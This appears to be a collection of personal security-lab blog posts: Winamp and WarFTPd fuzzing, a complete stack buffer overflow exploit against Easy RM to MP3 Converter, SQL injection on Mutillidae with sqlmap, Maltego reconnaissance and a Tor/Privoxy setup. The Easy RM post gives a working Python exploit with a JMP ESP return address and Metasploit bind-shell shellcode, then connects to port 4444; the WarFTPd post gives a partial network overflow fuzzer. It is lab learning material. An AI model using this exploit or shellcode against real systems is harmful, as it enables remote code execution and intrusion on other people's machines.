EXPLOIT WINAMP MUSIC PLAYER (SEH)

In this time I try to exploit winamp v 5.572 and make it crash.

From yesterday until now I have not found the right fuzzer to make it crash. 

I tried to create a fuzzer script to build file .swf, and after I run the fuzzer to generate file .swf  I try to run that file on winamp. 

#!/usr/bin/python

buffer="\x41" * 700

file="tets.swf"

file=open(file, "w")

file.write(buffer)

print("sukses gawe file")

file.close()

And what be happens??? Winamp has crashed.

When i run winamp on Ollydbg, I don't see trash that i sent

But i see the difference before and after i run the fuzzer.  Noticed the picture below :

Before

After

Until now i'm still confused and i'll try to exploit this application. TRY HARDER !!!

PRAY FOR ME 

STACK OVERFLOW EASY RM TO MP3 CONVERTER (NON SEH)

In this time i will explore how to exploit Easy RM to Mp3 Converter
You need to know this application is non SEH. You can search meaning of SEH on internet or everywhere.

Ok let's begin

1. Firstly we must have Ollydbg and Easy RM to Mp3 converter to start exploitation

install and run using windows on virtual box

2. Then we need python or something like that to make a fuzzer application to exploit.
I use python to make fuzzer.

i try to type fuzzer like this


#!/usr/bin/python
buffer="http://"+"\x41" * 28000
file="pusing1.ram"
file=open(file, "w")
file.write(buffer)
print("sukses gawe file")
file.close()

it's mean i try to give some waste as much as 2800 and output file is pusing1.ram

save to your directory then run fuzzer on backtrack console

in this case i save that fuzzer on shared folder directory to make easy an acces to this file.

we can see, once fuzzer is run it will generate output. Look picture below there are pusing1.ram as output

3. Run Easy converter on Ollydbg, and load output file 'pusing1.ram' to Easy converter

see what happens in Ollydbg. Cpu register on Ollydbg will display an error / crash

4. After we know that application is crash with 28000 so we generate it using pattern_create.rb. Then copy paste on fuzzer.

5. Rerun the application fuzzer, and see what happens on cpu register. EIP value is change to 326D4831

 then we will calculate in what number he crashes using pattern_offset.rb function

EIP crashes on 5825 and 26105, ESP crashes on 5833 and 26113

I have tried to use 5825 but it not causes crash, then i use 26105 and really the result is crash

buffer="http://"+"\x90" * 26105

buffer+="\xEF\xBE\xAD\xDE"

EIP value change to DEADBEEF

Then i add ESP value to fuzzer

buffer="http://"+"\x90" * 26105

buffer+="\xEF\xBE\xAD\xDE"

buffer+="http://"+"\x90" * (26113-len(buffer))

buffer+="http://"+"\xCC" * (28000-len(buffer)) 

Rerun the application fuzzer, and you will see

Window stack in Ollydbg containing junk data in the form of charachter \xCC.

6. After that according to exploitation strategy we try to find JMP ESP. 

Run the application fuzzer on Ollydbg. On the menu View select submenu Executetable modules

Double click on SHELL32.dll then find to JMP ESP

We'll find address on shell32.dll which containing JMP ESP command.

Address result is 7C9D30D7.  We try to command application fuzzer to change value on EIP register to be address from JMP ESP inside file shell32.dll.

Firstly we must to change that address to little endian format, from 7C9D30D7 to be \xD7\x30\x9D\x7C

then 

So the fuzzer is 

buffer="http://"+"\x90" * 26105

buffer+="\xD7\x30\x9D\x7C"

buffer+="http://"+"\x90" * (26113-len(buffer))

buffer+="http://"+"\xCC" * (28000-len(buffer)) 

Then pairs the breakpoint to memory 7C9D30D7

Run Easy converter using Ollydbg and rerun the fuzzer application. See what happens

On Cpu register we find SHELL32.7C9D30D7 right behind EIP address. Ollydbg prevent access to 7C9D30D7.

7. The last step is generate payload use metasploit framework. Chose Wind32 bind shell then entry some data like picture below, and click generate button

copy paste payload to fuzzer

#!/usr/bin/python

buffer="http://"+"\x90" * 26105

buffer+="\xD7\x30\x9D\x7C"

#buffer+="http://"+"\x90" * (26113-len(buffer))

#buffer+="http://"+"\xCC" * (28000-len(buffer)) 

buffer+="\x90" * 32

buffer+= ("\xdd\xc3\x31\xc9\xd9\x74\x24\xf4\x5b\xb1\x51\xbf\xa1\x1a\xa8\x27"

"\x83\xc3\x04\x31\x7b\x13\x03\xda\x09\x4a\xd2\xe0\x44\x61\x50\xf0"

"\x60\x8a\x94\xff\xf3\xfe\x07\xdb\xd7\x8b\x9d\x1f\x93\xf0\x18\x27"

"\xa2\xe7\xa8\x98\xbc\x7c\xf1\x06\xbc\x69\x47\xcd\x8a\xe6\x59\x3f"

"\xc3\x38\xc0\x13\xa0\x79\x87\x6c\x68\xb3\x65\x73\xa8\xaf\x82\x48"

"\x78\x14\x43\xdb\x65\xdf\xcc\x07\x67\x0b\x94\xcc\x6b\x80\xd2\x8d"

"\x6f\x17\x0e\x32\xbc\x9c\x59\x58\x98\xbe\x38\x63\xd1\x65\xde\xe8"

"\x51\xaa\x94\xae\x59\x41\xda\x32\xcf\xde\x5b\x42\x51\x89\xd5\x1c"

"\x63\xa5\xba\x5f\xad\x53\x68\xf9\x3a\xaf\xbc\x6d\xcc\xbc\xf2\x32"

"\x66\xbc\x23\xa4\x4d\xaf\x38\x0f\x02\xcf\x17\x30\x2b\xca\xfe\x4f"

"\xc6\x1d\xfd\x1a\x73\x1c\xfe\x74\xeb\xf9\x09\x81\x41\xae\xf6\xbf"

"\xc9\x02\x5a\x6c\xbd\xe7\x0f\xd1\x12\x17\x7f\xb3\xfc\xf6\xdc\x5d"

"\xae\x71\x3d\x34\x38\x26\xa4\x46\x7e\x71\x26\x70\xea\x6e\x89\x29"

"\x14\x5e\x41\x75\x47\x71\x7b\x22\x67\x58\x28\x99\x68\xb5\xa7\xc4"

"\xde\xb0\x71\x51\x1e\x6a\xd1\x09\xb4\xc6\x2d\x61\xa7\x81\x36\xf8"

"\x0e\x28\xee\x05\x58\x9e\xef\x29\x03\x4b\x74\xaf\xa4\xe8\x19\xa6"

"\xd0\x85\xb1\xe1\x33\x96\xbb\xf6\x2e\x62\x35\x1a\x9f\xaa\xb6\x70"

"\x1e\x68\x14\x7a\x9d\x41\xf5\x0f\x58\xa2\x52\xa4\x36\xba\xd6\x44"

"\xfb\x2d\xe8\xcd\xb8\xae\xc0\x76\x16\x03\xbc\xd9\xc9\xc9\x3f\x88"

"\xb8\x58\x11\xd5\xeb\x0b\x3c\xf0\x09\x02\x6d\xfd\xc4\xf0\x6d\xfe"

"\xde\xfb\x42\x8b\x76\xf8\xe0\x4f\x1c\xff\x31\x1d\x22\x2f\xd5\xdf"

"\x04\x32\x55\x4c\x4a\x65\x65\xa2")

file="pusing6.ram"

file=open(file, "w")

file.write(buffer)

print("sukses gawe file")

file.close()

Run Easy converter without Ollydbg then open / load the fuzzer file.

Wawwww, Easy converter has crashes

After run the fuzzer application then run telnet to connect into Windows xp systems via port 4444.

You can see what happens....

CMIIW

BUFFER OVERFLOW : WARFTPD (APLICATION NON SEH)

1. Install and run warftd on windows on virtual box

2. Then  make a simple fuzzer using python programming language, save using extension .py save on backtrack.
I saved it on backtrack with name xfuzz.py

fuzzer script :


import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
#buffer = "\x41" * 1000
s. connect (('192.168.43.128' ,21))
data = s. recv (1024)
print ("sending evile data via user comand...")
s. send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s. send ('PASS PASSWORD '+'\r\n')
s. close ()
print ("Finish")

warning : space is very influential in the python language

3.  To run WarFTP server chose propertis-start servise, then the status of WarFTP will be idle.

i'll tried to connenct ftp using nc, if succes yo will see like picture below

then i'l tried to run fuzzer on backtrack console, 

note the WarFTP, if successfully implemented fuzzer and make the application crash, warftp will disappear from the screen by itself.

every time you make fuzzer to warftp, application will be crash and configuration saved to file FtpDaemon.dat.

to re-run warftp server and prevent errors message then delete file FtpDaemon.dat

4. Re-run warftp server and add user dummies via user security properties.

Then run the Ollydbg to debugging Warftp server.

after adding the new user repeat process fuzzer. On this time the application warftd doesn't dispalyed error message.

Then run application warftp via Ollydbg, re-run fuzzer application. 

before fuzzer

after fuzzer

Seen clearly  what is happening in the system registry when the crash occurred.

There are 4 registry of affected fuzzer, that is ESP, EDI, EBP, and EIP

5. Pattern create 

One of the tools in the metasploit that can be used in conducting vulnerability development is pattern_create.

The purpose is to find out the true locations of a string in the data packets transmitted by the fuzzer into the application

using console go to folder /pentest/exploits/framework/tools

to produce as many as a thousand bytes of data run this command

 ./pattern_create.rb 1000 > string_pattern.txt

it will saved as string_pattern.txt

open string_pattern.txt and copy the code then add to xfuzz.py as buffer

then run again fuzzer to warftp application, note the register memory warftp server 

6. Pattern offset

This function to calculate the amount of bytes from the pattern set generated by the application pattern_create.rb

seen that to achieve the EIP register data needed for 485 byte

add this code to script xfuzz.py 

buffer = "\x90" * 485

once more run fuzzer to warftp application, note the register EIP.

we can look that register EIP change to DEADBEEF

TO BE CONTINUE... 

SQL INJECTION BYPASS : MUTILLIDAE

1. First start apache and mysql

2. Open mutillidae with typing on browser localhost/mutillidae

3. Set up proxy your browser to localhost port 8080

4. Open burp suite and set the tartget as localhost

Then look, what happening when we click login button on mutillidae. Burp suite was succesfully intercept mutillidae activity. View picture below :

This is the result of interception, you will see some information such as post request to localhost like username and password format post

5.  Next open sqlmap, and test to know backend database

As result we get some database:

6. We get some database, i tried to get tables from database nowasp

And the result

7. Then i try to get columns on table accounts

result :

8. Finally we get the columns from accounts table, then i'll try to dump the username

as the result :

dump the password

9. Last step i'll go into mysql shell

type #mysql -h [host] -u user -p

I got it !!!






CMIIW

INFORMATION GATHERING USING MALTEGO

To using maltego we need to register before.

after registered, open maltego and you will see main display of maltego












Then drag some information from the pallete panel, example DNS. I type is2c-dojo.com as DNS.

Start transforms and you will get some information such as website which visited and some relationship.

This is some information will you get

additional i use tool whois to add other information i.e dns, server update, telp number and etc.

CMIIW

INSTALL TOR AND PRIVOXY ON LINUX

Installation of Tor and Privoxy

You will first need to add the repository from which you wish to install Tor and Privoxy. Open the /etc/apt/sources.list file (or your preferred config editor) with vi:

vi /etc/apt/sources.list


Press the i (insert key), and add the following line:

deb http://deb.torproject.org/torproject.org lucid main






Click Esc to stop editing, then :wq [enter] or ZZ (shift zz) to write the changes to the file and quit vi.

Run the following commands : 

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -









During installation you will be asked whether you want to continue. If there are no strange warnings and it resembles this output, answer Y.

Run the following commands to install tor and privoxy:

apt-get update
apt-get install tor tor-geoipdb

apt-get install privoxy

Privoxy configuration

Open /etc/privoxy/config with vi (or your preferred config editor)

vi /etc/privoxy/config


Scroll down. In section 4.1, check that the listen address is 127.0.0.1:8118

If it is not, change it by pressing the A (shift a) key or i key (or any other insertion way), making the necessary changes, and pressing the esc key when you are done. Scroll down further to section 5.

When using socks5 on port %d, your application is giving Tor only an IP address. Applications that do DNS resolves themselves may leak information. So using Socks4A instead is a good idea. Read more on thathere.

In section 5.2, set forward privoxy to TOR (Do NOT forget that point at the end)

forward-socks4a / 127.0.0.1:9050 .

The following two configuration changes are performance improvements.
In 6.4 change keep-alive-timeout 300 to keep-alive-timeout 600 and in 6.6 change socket-timeout 300 to socket-timeout 600:

Click Esc to stop editing, then :wq [enter] or ZZ (shift zz) to write the changes to the file and quit vi.

Starting (and stopping) privoxy

Run the command:

/etc/init.d/privoxy start


You can run the same command but then with "stop" instead of "start" if you wish to stop privoxy. If you do, and you have already configured clients, connections will be refused.

System wide configuration of clients

Configure your clients with IP address 127.0.0.1 and port 8118

Check that it's working:


https://check.torproject.org/

CMIIW